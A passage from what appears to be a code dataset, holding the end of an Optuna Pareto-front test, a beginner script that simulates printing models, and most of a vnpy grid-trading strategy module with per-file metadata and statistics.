study.optimize(lambda t: [1, 3, 1], n_trials=1)
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_nd(study.trials, study.directions)
} == {(1, 3, 1)}
assert len(_get_pareto_front_trials_nd(study.trials, study.directions)) == 1
study.optimize(
lambda t: [1, 3, 1], n_trials=1
) # The trial result is the same as the above one.
assert {
_trial_to_values(t) for t in _get_pareto_front_trials_nd(study.trials, study.directions)
} == {(1, 3, 1)}
assert len(_get_pareto_front_trials_nd(study.trials, study.directions)) == 2
| 35.39604 | 98 | 0.66042 | 550 | 3,575 | 3.976364 | 0.085455 | 0.090535 | 0.140832 | 0.201189 | 0.924097 | 0.920439 | 0.895748 | 0.853681 | 0.833105 | 0.833105 | 0 | 0.036106 | 0.20979 | 3,575 | 100 | 99 | 35.75 | 0.738053 | 0.026014 | 0 | 0.592593 | 0 | 0 | 0.011498 | 0 | 0 | 0 | 0 | 0 | 0.234568 | 1 | 0.037037 | false | 0 | 0.061728 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b9388be997e4b25d7ca44b7a16fd47593954c5cc | 1,531 | py | Python | printing_models.py | mikvikpik/Project_Training | 4d55b092f6cee696cbd93ec3d018de5ba2135167 | [
"MIT"
] | 1 | 2020-01-17T01:06:17.000Z | 2020-01-17T01:06:17.000Z | printing_models.py | mikvikpik/Project_Training | 4d55b092f6cee696cbd93ec3d018de5ba2135167 | [
"MIT"
] | null | null | null | printing_models.py | mikvikpik/Project_Training | 4d55b092f6cee696cbd93ec3d018de5ba2135167 | [
"MIT"
] | null | null | null | """ Modifying a list"""
# without functions
# Start with some designs that need to be printed.
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []
# Simulate printing each design, until none are left.
# Move each design to completed_model after printing.
while unprinted_designs:
current_design = unprinted_designs.pop()
# Simulate creating a 3D print from the design.
print("Printing model: " + current_design)
completed_models.append(current_design)
# Display all completed models.
print("\nThe following models have been printed:")
for completed_model in completed_models:
print(completed_model)
# print the same output with functions
def print_models(unprinted_designs, completed_models):
"""
Simulate printing each design, until none are left.
Move each design to completed_models after printing.
"""
while unprinted_designs:
current_design = unprinted_designs.pop()
# Simulate creating a 3D print from the design.
print("Printing model: " + current_design)
completed_models.append(current_design)
def show_completed_models(completed_models):
"""Show all the models that were printed."""
print("\nThe following models have been printed:")
for completed_model in completed_models:
print(completed_model)
unprinted_designs = ['iphone case', 'robot pendant', 'dodecahedron']
completed_models = []
print_models(unprinted_designs, completed_models)
show_completed_models(completed_models)
| 31.895833 | 68 | 0.747877 | 189 | 1,531 | 5.867725 | 0.291005 | 0.18936 | 0.072137 | 0.046889 | 0.844004 | 0.782687 | 0.720469 | 0.720469 | 0.720469 | 0.616772 | 0 | 0.001577 | 0.171783 | 1,531 | 47 | 69 | 32.574468 | 0.873028 | 0.320705 | 0 | 0.818182 | 0 | 0 | 0.185629 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0 | 0 | 0.090909 | 0.636364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 8 |
b961321bd95e72618f748377b359e5f609af0c92 | 114,175 | py | Python | vnpy/trader/app/ctaStrategy/ctaGridTrade.py | riverdarda/vnpy.-msincense | 4f39ef3269082581171f3d0d6f046224266a8d21 | [
"MIT"
] | 3 | 2020-08-14T00:06:32.000Z | 2021-11-22T00:50:02.000Z | vnpy/trader/app/ctaStrategy/ctaGridTrade.py | currently1/vnpy | 674c9f04fe7d8e0784e5d98e96cd9f797742d22a | [
"MIT"
] | null | null | null | vnpy/trader/app/ctaStrategy/ctaGridTrade.py | currently1/vnpy | 674c9f04fe7d8e0784e5d98e96cd9f797742d22a | [
"MIT"
] | 3 | 2020-03-07T12:45:00.000Z | 2021-02-14T03:10:38.000Z | # encoding: UTF-8
import os,sys
from datetime import datetime
import json
import uuid
import shutil
from collections import OrderedDict
from vnpy.trader.app.ctaStrategy.ctaBase import *
from vnpy.trader.vtConstant import *
import traceback
DEBUGCTALOG = True
"""
网格交易,用于套利单
作者:李来佳,QQ/Wechat:28888502
ChangeLog:
160713,修改closeGrid,增加volume字段,关闭网格时,根据价格和交易量进行双重匹配.
160715,增加保存json和重启后加载本地json文件
170504,增加锁单网格
170707,增加重用选项
170719, 增加网格类型
171208,增加openPrices/snapshot
180420, 增加CtaLegacyGridTrade(传统网格:上网格做多,下网格做空)
"""
# 网格类型
SPREAD_GRID = 'spread' # 价差回归网格
PERIOD_GRID = 'period' # 周期网格
TREND_GRID = 'trend' # 趋势网格
LOCK_GRID = 'lock' # 对锁网格
class CtaGrid(object):
"""网格类
它是网格交易的最小单元
包括交易方向,开仓价格,平仓价格,止损价格,开仓状态,平仓状态
"""
def __init__(self, direction, openprice, closeprice, stopprice=EMPTY_FLOAT, volume=1, type=EMPTY_STRING, vtSymbol=EMPTY_STRING):
self.id = str(uuid.uuid1())
self.direction = direction # 交易方向(LONG:多,正套;SHORT:空,反套)
self.openPrice = openprice # 开仓价格
self.closePrice = closeprice # 平仓价格
self.stopPrice = stopprice # 止损价格
self.vtSymbol = vtSymbol # 品种合约
self.volume = volume # 开仓数量
self.tradedVolume = EMPTY_INT # 成交数量 开仓时,为开仓数量,平仓时,为平仓数量
self.orderStatus = False # 挂单状态: True,已挂单,False,未挂单
self.orderRef = EMPTY_STRING # OrderId
self.openStatus = False # 开仓状态
self.closeStatus = False # 平仓状态
self.openDatetime = None
self.orderDatetime = None # 委托时间
self.lockGrids = [] # 锁单的网格,[openPrice,openPrice]
self.reuse = False # 是否重用(平仓后是否删除)
self.type = type # 网格类型标签
self.openPrices = {} # 套利使用,开仓价格,symbol:price
self.snapshot = {} # 切片数据,如记录开仓点时的某些状态数据
def toJson(self):
"""输出JSON"""
j = OrderedDict()
j['id'] = self.id
j['direction'] = self.direction
j['openPrice'] = self.openPrice # 开仓价格
j['closePrice'] = self.closePrice # 平仓价格
j['stopPrice'] = self.stopPrice # 止损价格
j['vtSymbol'] = self.vtSymbol # 品种数量
j['volume'] = self.volume # 开仓数量
j['tradedVolume'] = self.tradedVolume # 成交数量
j['orderStatus'] = self.orderStatus # 挂单状态: True,已挂单,False,未挂单
j['orderRef'] = self.orderRef # OrderId
j['openStatus'] = self.openStatus # 开仓状态
j['closeStatus'] = self.closeStatus # 平仓状态
j['lockGrids'] = self.lockGrids # 对锁的网格
j['reuse'] = self.reuse # 是否重用
j['type'] = self.type # 类型
j['openPrices'] = self.openPrices # 套利中,两腿的开仓价格
j['snapshot'] = self.snapshot # 切片数据
if type(self.openDatetime) == type(None):
j['openDatetime'] = EMPTY_STRING
else:
try:
j['openDatetime'] = self.openDatetime.strftime('%Y-%m-%d %H:%M:%S')
except Exception:
j['openDatetime'] = EMPTY_STRING
return j
def fromJson(self,j):
"""从JSON恢复"""
try:
self.id = j.get('id',None)
if self.id is None:
self.id = str(uuid.uuid1())
self.direction = j.get('direction',EMPTY_STRING)
self.closePrice = j.get('closePrice', EMPTY_FLOAT)
self.openPrice = j.get('openPrice', EMPTY_FLOAT)
self.stopPrice = j.get('stopPrice', EMPTY_FLOAT)
self.orderStatus = j.get('orderStatus',False) # 挂单状态: True,已挂单,False,未挂单
self.orderRef = j.get('orderRef',EMPTY_STRING) # OrderId
self.openStatus = j.get('openStatus',False) # 开仓状态
self.closeStatus = j.get('closeStatus',False) # 平仓状态
strTime = j.get('openDatetime',None)
if strTime == EMPTY_STRING or strTime is None:
self.openDatetime = None
else:
self.openDatetime = datetime.strptime(strTime, '%Y-%m-%d %H:%M:%S')
self.vtSymbol = j.get('vtSymbol',EMPTY_STRING)
self.volume = j.get('volume',EMPTY_FLOAT)
self.tradedVolume = j.get('tradedVolume',EMPTY_FLOAT) # 已交易的合约数量
self.lockGrids = j.get('lockGrids',[])
self.type = j.get('type',EMPTY_STRING)
if self.type == False:
self.type = EMPTY_STRING
self.reuse = j.get('reuse',False)
self.openPrices = j.get('openPrices',{})
self.snapshot = j.get('snapshot',{})
except Exception as ex:
print('CtaGrid fromJson Exception:{} {}'.format(str(ex),traceback.format_exc()),file=sys.stderr)
def toStr(self):
"""输入字符串"""
str = u'o:{}/{};c:{}/{},r:{}/opentime:{}/ordertime:{}'\
.format(self.openPrice, self.openStatus, self.closePrice,
self.closeStatus, self.orderRef, self.openDatetime, self.orderDatetime)
if len(self.vtSymbol) > 0:
return u'{} {}'.format(self.vtSymbol,str)
else:
return str
def __eq__(self,other):
return self.id == other.id
class CtaGridTrade(object):
"""网格交易类
包括两个方向的网格队列,
v1, 基本版
v2,增加更新最小价格跳动,增加动态上下网格间距
v3, 合并up/dn为一个文件
"""
def __init__(self, strategy, maxlots=5, height=2, win=2, vol=1, minDiff = 1):
"""初始化
maxlots,最大网格数
height,网格高度(绝对值,包含minDiff)
win,盈利数(包含minDiff)
vol,网格开仓数
minDiff, 最小价格跳动
"""
self.minDiff = minDiff
self.strategy = strategy
self.jsonName = self.strategy.name #策略名称
self.useMongoDb = True
self.maxLots = maxlots # 缺省网格数量
self.gridHeight = height # 最小网格高度
self.gridWin = win # 最小止盈高度
self.volume = vol # 每次网格开仓数量
self.volumeList = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1] # 梯级开仓数量比例
self.upGrids = [] # 上网格列表,专门做空
self.dnGrids = [] # 下网格列表,专门做多
self.avg_up_open_price = EMPTY_FLOAT # 上网格开仓均价
self.avg_dn_open_price = EMPTY_FLOAT # 下网格开仓均价
self.max_up_open_price = EMPTY_FLOAT # 上网格开仓均价
self.min_dn_open_price = EMPTY_FLOAT # 下网格开仓均价
self.json_file_path = os.path.join(self.get_data_folder(), u'{}_Grids.json'.format(self.jsonName)) # 网格的路径
def changeGridHeight(self, grid_height=EMPTY_FLOAT, grid_win=EMPTY_FLOAT):
self.gridHeight = grid_height
self.gridWin = grid_win
def getVolumeRate(self, gridIndex=EMPTY_INT):
"""获取网格索引对应的开仓数量比例"""
if gridIndex >= len(self.volumeList) or gridIndex < 0:
return 1
rate = self.volumeList[gridIndex]
if rate == 0:
return 1
else:
return rate
def initGrid(self, upline=EMPTY_FLOAT, dnline=EMPTY_FLOAT, max_lots=EMPTY_INT, reuse= False):
"""初始化网格队列
upline,上支撑线
dnline,下阻力线
"""
if max_lots > EMPTY_INT:
lots = max_lots
else:
lots = self.maxLots
self.writeCtaLog(u'初始化网格队列,upline:{0},dnline:{1}'.format(upline, dnline))
# 初始化上网格列表
if len(self.upGrids) == 0:
self.upGrids = self.load(direction= DIRECTION_SHORT)
if len(self.upGrids) > 0:
self.writeCtaLog(u'上网格从文件{}加载完成'.format(self.json_file_path))
else:
# 做空,开仓价为上阻力线+网格高度*i,平仓价为开仓价-止盈高度,开仓数量为缺省
for i in range(0, lots, 1):
grid = CtaGrid(direction=DIRECTION_SHORT,
openprice=upline+self.gridHeight*i,
closeprice=upline+self.gridHeight*i-self.gridWin,
volume=self.volume*self.getVolumeRate(i))
if reuse:
grid.reuse = reuse
self.upGrids.append(grid)
self.writeCtaLog(u'上网格{0}~{1}初始化完成'.format(upline,upline+self.gridHeight*self.maxLots))
self.save(direction=DIRECTION_SHORT)
# 初始化下网格列表
if len(self.dnGrids) == 0:
self.dnGrids = self.load(direction= DIRECTION_LONG)
if len(self.dnGrids) > 0:
self.writeCtaLog(u'下网格从文件{}加载完成'.format(self.json_file_path))
else:
for i in range(0, lots, 1):
# 做多,开仓价为下阻力线-网格高度*i,平仓价为开仓价+止盈高度,开仓数量为缺省
grid = CtaGrid(direction=DIRECTION_LONG,
openprice=dnline - self.gridHeight * i,
closeprice=dnline - self.gridHeight * i + self.gridWin,
volume=self.volume*self.getVolumeRate(i))
if reuse:
grid.reuse = reuse
self.dnGrids.append(grid)
self.writeCtaLog(u'下网格{0}~{1}初始化完成'.format(dnline,dnline-self.gridHeight*self.maxLots))
self.save(direction=DIRECTION_LONG)
def writeCtaLog(self, log):
self.strategy.writeCtaLog(log)
def toStr(self, direction):
"""显示网格"""
pendingCloseList = u'' # 平仓清单
pendingOpenList = u'' # 开仓清单
deactiveList = u'' # 待激活清单
openedVolumeDict = {} # 开仓数量汇总
if direction == DIRECTION_LONG:
for grid in self.dnGrids:
t = EMPTY_STRING
if grid.type == LOCK_GRID:
t = u'L:'
elif grid.type == TREND_GRID:
t = u'T:'
elif grid.type == PERIOD_GRID:
t = u'P:'
else:
t = grid.type
# 待平仓
if grid.openStatus:
opened_volume = 0
if grid.tradedVolume == EMPTY_INT:
pendingCloseList = pendingCloseList + u'{}[{}->{},sp:{},v:{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume)
opened_volume = grid.volume
else:
pendingCloseList = pendingCloseList + u'[{}{}->{},sp:{},v:{}/{}];'\
.format(t, grid.openPrice, grid.closePrice, grid.volume, grid.stopPrice, grid.tradedVolume)
opened_volume = grid.volume - grid.tradedVolume
if grid.type != EMPTY_STRING:
openedVolumeDict[grid.type] = opened_volume if grid.type not in openedVolumeDict else opened_volume + openedVolumeDict[grid.type]
openedVolumeDict['All'] = opened_volume if 'All' not in openedVolumeDict else opened_volume + openedVolumeDict['All']
# 待开仓成交
elif not grid.openStatus and grid.orderStatus:
if grid.tradedVolume == EMPTY_INT:
pendingOpenList = pendingOpenList + u'[{}{},v:{}];'.format(t, grid.openPrice, grid.volume)
else:
pendingOpenList = pendingOpenList + u'[{} {},v:{}/{}];'\
.format(t, grid.openPrice, grid.volume, grid.tradedVolume)
# 等待挂单
else:
deactiveList = deactiveList + u'[{}{}];'.format(t, grid.openPrice)
return u'多:待平:[{}],{};开:{};待:{}'.format(openedVolumeDict, pendingCloseList, pendingOpenList, deactiveList)
if direction == DIRECTION_SHORT:
for grid in self.upGrids:
t = EMPTY_STRING
if grid.type == LOCK_GRID:
t = u'L:'
elif grid.type == TREND_GRID:
t = u'T:'
elif grid.type == PERIOD_GRID:
t = u'P:'
else:
t = grid.type
# 待平仓
if grid.openStatus:
opened_volume = 0
if grid.tradedVolume == EMPTY_INT:
pendingCloseList = pendingCloseList + u'[{} {}->{},sp:{},v:{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume)
opened_volume = grid.volume
else:
pendingCloseList = pendingCloseList + u'[{} {}->{},sp:{}, v:{}/{}];'\
.format(t,grid.openPrice, grid.closePrice, grid.stopPrice, grid.volume, grid.tradedVolume)
opened_volume = grid.volume - grid.tradedVolume
if grid.type != EMPTY_STRING:
openedVolumeDict[grid.type] = opened_volume if grid.type not in openedVolumeDict else opened_volume + openedVolumeDict[grid.type]
openedVolumeDict['All'] = opened_volume if 'All' not in openedVolumeDict else opened_volume + openedVolumeDict['All']
# 待开仓成交
elif not grid.openStatus and grid.orderStatus:
if grid.tradedVolume == EMPTY_INT:
pendingOpenList = pendingOpenList + u'[{} {},v:{}];'.format(t, grid.openPrice, grid.volume)
else:
pendingOpenList = pendingOpenList + u'[{} {},v:{}/{}];'\
.format(t, grid.openPrice, grid.volume, grid.tradedVolume)
# 等待挂单
else:
deactiveList = deactiveList + u'[{}{}];'.format(t, grid.openPrice)
return u'空:待平:[{}],{};开:{};待:{}'.format(openedVolumeDict, pendingCloseList,pendingOpenList,deactiveList)
def getGridsWithTypes(self, direction, types=[]):
"""获取符合类型的网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
type:网格类型列表,
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_LONG:
grids = [x for x in self.dnGrids
if x.type in types]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.upGrids
if x.type in types]
return grids
def getOpenedGridsWithTypes(self, direction, types=[]):
"""获取符合类型的持仓网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
type:网格类型列表,
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_LONG:
grids = [x for x in self.dnGrids
if x.openStatus == True and x.type in types]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.upGrids
if x.openStatus == True and x.type in types]
return grids
def getOpenedGrids(self, direction,allow_empty_volume = False):
"""获取已开仓的网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_LONG:
grids = [x for x in self.dnGrids
if x.openStatus == True and (x.volume - x.tradedVolume > 0 or allow_empty_volume)]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_SHORT:
grids = [x for x in self.upGrids
if x.openStatus == True and (x.volume - x.tradedVolume > 0 or allow_empty_volume)]
return grids
def getGrids(self, direction, ordered=False, opened=False, closed=False, begin=EMPTY_FLOAT, end=EMPTY_FLOAT, type=EMPTY_STRING):
"""获取未挂单的网格
direction:做多、做空方向: 做多方向时,从dnGrids中获取; 做空方向时,从upGrids中获取
ordered:是否已提交至服务器
opened:是否已开仓
closed:是否已平仓
begin:开始价格,
end:结束价格,
"""
# 状态一致,价格大于最低价格
if direction == DIRECTION_LONG:
if begin == EMPTY_FLOAT: begin = sys.maxsize
if end == EMPTY_FLOAT: end = 0-sys.maxsize
grids = [x for x in self.dnGrids
if x.orderStatus == ordered
and x.openStatus == opened
and x.closeStatus == closed
and x.openPrice <= begin
and x.openPrice >= end
and x.type == type]
return grids
# 状态一致,开仓价格小于最高价格
if direction == DIRECTION_SHORT:
if begin == EMPTY_FLOAT: begin = 0-sys.maxsize
if end == EMPTY_FLOAT: end = sys.maxsize
grids = [x for x in self.upGrids
if x.orderStatus == ordered
and x.openStatus == opened
and x.closeStatus == closed
and x.openPrice >= begin
and x.openPrice <= end
and x.type == type]
return grids
def getGridById(self,direction, id):
"""寻找指定id的网格"""
if id == EMPTY_STRING or len(id) <1:
return
if direction == DIRECTION_LONG:
for x in self.dnGrids[:]:
if x.id == id:
self.writeCtaLog(u'找到下网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
return x
if direction == DIRECTION_SHORT:
for x in self.upGrids[:]:
if x.id == id:
self.writeCtaLog(u'找到上网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
return x
return None
def getPosition(self,direction, type=EMPTY_STRING):
"""获取特定类型的网格持仓"""
if direction == DIRECTION_LONG:
long_vol = [x.volume-x.tradedVolume for x in self.dnGrids if x.openStatus and x.type == type]
return sum(long_vol)
if direction == DIRECTION_SHORT:
short_vol = [x.volume - x.tradedVolume for x in self.upGrids if x.openStatus and x.type == type]
return sum(short_vol)
def updateOrderRef(self, direction, openPrice, orderRef):
"""更新网格的orderId"""
if direction == DIRECTION_LONG:
for x in self.dnGrids:
if x.openPrice == openPrice:
x.orderRef = orderRef
x.orderStatus = True
if direction == DIRECTION_SHORT:
for x in self.upGrids:
if x.openPrice == openPrice:
x.orderRef = orderRef
x.orderStatus = True
def cancelOrderRef(self,direction, openPrice):
"""网格撤单"""
if direction == DIRECTION_LONG:
for x in self.dnGrids:
if x.openPrice == openPrice and x.orderRef != EMPTY_STRING and x.orderStatus==True and x.openStatus==False:
x.orderRef = EMPTY_STRING
x.orderStatus = False
self.writeCtaLog(u'下网格撤单[{0}]'.format(x.openPrice))
if direction == DIRECTION_SHORT:
for x in self.upGrids:
if x.openPrice == openPrice and x.orderRef != EMPTY_STRING and x.orderStatus==True and x.openStatus==False:
x.orderRef = EMPTY_STRING
x.orderStatus = False
self.writeCtaLog(u'上网格撤单[{0}]'.format(x.openPrice))
def getGridbyOpenPrice(self, direction, openPrice, orderRef = EMPTY_STRING):
"""通过开仓价和委托状态获取网格"""
if direction == DIRECTION_LONG:
for x in self.dnGrids:
# 优先匹配价格
if x.orderRef == orderRef and x.openPrice == openPrice:
return x
if direction == DIRECTION_SHORT:
for x in self.upGrids:
# 优先匹配价格
if x.orderRef == orderRef and x.openPrice == openPrice:
return x
self.writeCtaLog(u'异常,getGridbyOpenPrice找不到网格[{0},openprice={1},orderRef={2}]'.format(direction, openPrice, orderRef))
return None
def getGrid(self, direction, openPrice=EMPTY_FLOAT, closePrice=EMPTY_FLOAT, orderRef=EMPTY_STRING, t=EMPTY_STRING):
"""获取网格"""
if direction == DIRECTION_LONG:
for x in self.dnGrids:
# 优先匹配价格
if t == u'OpenPrice' and x.openPrice == openPrice:
return x
elif t == u'ClosePrice' and x.closePrice == closePrice:
return x
elif t == u'OrderRef' and x.orderRef == orderRef:
return x
if direction == DIRECTION_SHORT:
for x in self.upGrids:
# 优先匹配价格
if t == u'OpenPrice' and x.openPrice == openPrice:
return x
elif t == u'ClosePrice' and x.closePrice == closePrice:
return x
elif t == u'OrderRef' and x.orderRef == orderRef:
return x
self.writeCtaLog(u'异常,getGrid找不到网格[direction={0},oepnPrice={1},closePrice={2},orderRef={3},t={4}]'.format(direction, openPrice, closePrice, orderRef, t))
return None
def getFirstLastGrid(self, direction,type = EMPTY_STRING):
"""获取最前/后一个的网格"""
# 做空网格:,first =开仓价最高一个,last= 最低一个
if direction == DIRECTION_SHORT:
short_grids = self.getGridsWithTypes(direction=direction, types=[type])
if short_grids is None or len(short_grids) ==0 :
return None, None
if len(short_grids) == 1:
return short_grids[0],short_grids[0]
# 价格由低至高排列
sortedGrids = sorted(short_grids, key=lambda g:g.openPrice)
return sortedGrids[-1], sortedGrids[0]
# 做多网格: first =最低一个,last= 开仓价最高一个
if direction == DIRECTION_LONG:
long_grids = self.getGridsWithTypes(direction=direction, types=[type])
if long_grids is None or len(long_grids) ==0:
return None, None
if len(long_grids) == 1:
return long_grids[0], long_grids[0]
sortedGrids = sorted(long_grids, key=lambda g: g.openPrice)
return sortedGrids[0], sortedGrids[-1]
return None,None
def getLastOpenedGrid(self, direction,type = EMPTY_STRING, orderby_asc=True):
"""获取最后一个开仓的网格"""
# highest_short_price_grid = getLastOpenedGrid(DIRECTION_SHORT
if direction == DIRECTION_SHORT:
opened_short_grids = self.getGrids(direction=direction, opened=True,type=type)
if opened_short_grids is None or len(opened_short_grids) ==0 :
return None
if len(opened_short_grids) > 1:
sortedGrids = sorted(opened_short_grids, key=lambda g:g.openPrice)
if orderby_asc:
# 取价格最高的一格
opened_short_grids = sortedGrids[-1:]
else:
# 取价格最低的一格
opened_short_grids = sortedGrids[0:1]
return opened_short_grids[0]
if direction == DIRECTION_LONG:
opened_long_grids = self.getGrids(direction=direction, opened=True,type=type)
if opened_long_grids is None or len(opened_long_grids) ==0:
return None
if len(opened_long_grids) > 1:
sortedGrids = sorted(opened_long_grids, key=lambda g: g.openPrice)
if orderby_asc:
# 取价格最低的一格
opened_long_grids = sortedGrids[0:1]
else:
# 取价格最高的一格
opened_long_grids = sortedGrids[-1:]
return opened_long_grids[0]
def closeGrid(self, direction, closePrice, closeVolume):
"""网格交易结束"""
if direction == DIRECTION_LONG:
for x in self.dnGrids:
if x.closePrice == closePrice and x.openStatus and x.volume == closeVolume:
self.writeCtaLog(u'下网格交易结束[{0}->{1}],仓位:{2},移除网格'.format(x.openPrice, x.closePrice,closeVolume))
self.dnGrids.remove(x)
return
if x.closePrice == closePrice and x.openStatus and x.volume > closeVolume:
self.writeCtaLog(u'下网格交易部分结束[{0}->{1}],减少仓位:{2}'.format(x.openPrice, x.closePrice,closeVolume))
x.volume = x.volume - closeVolume
if x.closePrice == closePrice and x.openStatus and x.volume < closeVolume:
self.writeCtaLog(u'下网格交易结束[{0}->{1}],移除网格,剩余仓位:{2}'.format(x.openPrice, x.closePrice, closeVolume-x.volume))
closeVolume = closeVolume - x.volume
self.dnGrids.remove(x)
if direction == DIRECTION_SHORT:
for x in self.upGrids:
if x.closePrice == closePrice and x.openStatus and x.volume == closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],仓位:{2},移除网格'.format(x.openPrice, x.closePrice,closeVolume))
self.upGrids.remove(x)
return
if x.closePrice == closePrice and x.openStatus and x.volume > closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],仓位减少:{2}'.format(x.openPrice, x.closePrice,closeVolume))
x.volume = x.volume - closeVolume
if x.closePrice == closePrice and x.openStatus and x.volume < closeVolume:
self.writeCtaLog(u'上网格交易结束[{0}->{1}],移除网格,剩余仓位:{2}'.format(x.openPrice, x.closePrice,closeVolume-x.volume))
closeVolume = closeVolume - x.volume
self.upGrids.remove(x)
def removeGridById(self,direction, id):
"""移除指定id的网格"""
if id == EMPTY_STRING or len(id) <1:
return
if direction == DIRECTION_LONG:
for x in self.dnGrids[:]:
if x.id == id:
self.writeCtaLog(u'清除下网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
self.dnGrids.remove(x)
if direction == DIRECTION_SHORT:
for x in self.upGrids[:]:
if x.id == id:
self.writeCtaLog(u'清除上网格[open={},close={},stop={},volume={}]'.format(x.openPrice,x.closePrice,x.stopPrice,x.volume))
self.upGrids.remove(x)
def removeGrids(self, direction, priceline, type=EMPTY_STRING):
"""清除价格线以下的网格"""
if direction == DIRECTION_LONG:
for x in self.dnGrids[:]:
if x.openPrice > priceline and not x.orderStatus and not x.openStatus and not x.closeStatus and x.type==type:
self.writeCtaLog(u'清除下网格[open={0}]'.format(x.openPrice))
self.dnGrids.remove(x)
if direction == DIRECTION_SHORT:
for x in self.upGrids[:]:
if x.openPrice < priceline and not x.orderStatus and not x.openStatus and not x.closeStatus and x.type==type:
self.writeCtaLog(u'清除上网格[open={0}]'.format(x.openPrice))
self.upGrids.remove(x)
def moveGrids(self, direction, pricedelta, type=EMPTY_STRING):
"""按pricedelta平移所有网格"""
if direction == DIRECTION_LONG:
for x in self.dnGrids[:]:
x.openPrice += pricedelta # 开仓价格
x.closePrice += pricedelta # 平仓价格
x.stopPrice += pricedelta # 止损价格
x.type = type # 网格类型标签
# self.openPrices = {} # 套利使用,开仓价格,symbol:price
if direction == DIRECTION_SHORT:
for x in self.upGrids[:]:
x.openPrice += pricedelta # 开仓价格
x.closePrice += pricedelta # 平仓价格
x.stopPrice += pricedelta # 止损价格
x.type = type # 网格类型标签
# self.openPrices = {} # 套利使用,开仓价格,symbol:price
def rebuildGrids(self, direction, upline=EMPTY_FLOAT, dnline=EMPTY_FLOAT, midline=EMPTY_FLOAT, upRate=1, dnRate=1, reuse=False, useVariableSteps=False):
"""重新拉网
清除未挂单的网格,
在上轨/下轨位置重新挂单
upRate , 上轨网格高度比率
dnRate, 下轨网格高度比率
"""
self.writeCtaLog(u'重新拉网:direction:{},upline:{},dnline:{}'.format(direction, upline, dnline))
# 检查上下网格的高度比率,不能低于0.5
if upRate < 0.5 or dnRate < 0.5:
upRate = max(0.5, upRate)
dnRate = max(0.5, dnRate)
# 计算每个网格的高度。如果使用变高的网格,则每过5格把网格搞的增加(self.gridHeight/2)
gridSteps = [0]*self.maxLots
for i in range(1, self.maxLots, 1):
if useVariableSteps == False:
gridSteps[i] = self.gridHeight * i
else:
j = int(i / 5)
gridSteps[i] = gridSteps[i-1] + self.gridHeight + self.gridHeight / 2 * j
# 重建下网格(移除未挂单、保留开仓得网格、在最低价之下才增加网格
if direction == DIRECTION_LONG:
min_long_price = midline
remove_grids = []
opened_grids = []
# 移除未挂单的下网格
for x in self.dnGrids[:]:
if not x.orderStatus and not x.openStatus and not x.closeStatus:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
self.dnGrids.remove(x)
else:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
if x.openPrice < min_long_price:
min_long_price = x.openPrice
if len(remove_grids) > 0:
self.writeCtaLog(u'清除下网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
self.writeCtaLog(u'保留下网格[{}]'.format(opened_grids))
# 需要重建的剩余网格数量
remainLots = len(self.dnGrids)
lots = self.maxLots - remainLots
dnline = min(dnline, min_long_price-self.gridHeight*dnRate)
self.writeCtaLog(u'需要重建的网格数量:{0},起点:{1}'.format(lots, dnline))
if lots > 0:
for i in range(0, lots, 1):
# 做多,开仓价为下阻力线-网格高度*i,平仓价为开仓价+止盈高度,开仓数量为缺省
open_price = int((dnline - gridSteps[i+remainLots] * dnRate) / self.minDiff ) * self.minDiff
close_price = int((open_price + self.gridWin* dnRate)/self.minDiff) * self.minDiff
grid = CtaGrid(direction=DIRECTION_LONG,
openprice=open_price,
closeprice=close_price,
volume=self.volume*self.getVolumeRate(remainLots + i))
grid.reuse = reuse
self.dnGrids.append(grid)
self.writeCtaLog(u'重新拉下网格:[{0}~{1}]'.format(dnline, dnline - gridSteps[-1] * dnRate))
# 重建上网格(移除未挂单、保留开仓得网格、在最高价之上才增加网格
if direction == DIRECTION_SHORT:
max_short_price = midline # 最高开空价
remove_grids = [] # 移除的网格列表
opened_grids = [] # 已开仓的网格列表
# 移除未挂单的上网格
for x in self.upGrids[:]:
if not x.orderStatus and not x.openStatus and not x.closeStatus:
remove_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
self.upGrids.remove(x)
else:
opened_grids.append(u'{}=>{}'.format(x.openPrice, x.closePrice))
if x.openPrice > max_short_price:
max_short_price = x.openPrice
if len(remove_grids) > 0:
self.writeCtaLog(u'清除上网格[{}]'.format(remove_grids))
if len(opened_grids) > 0:
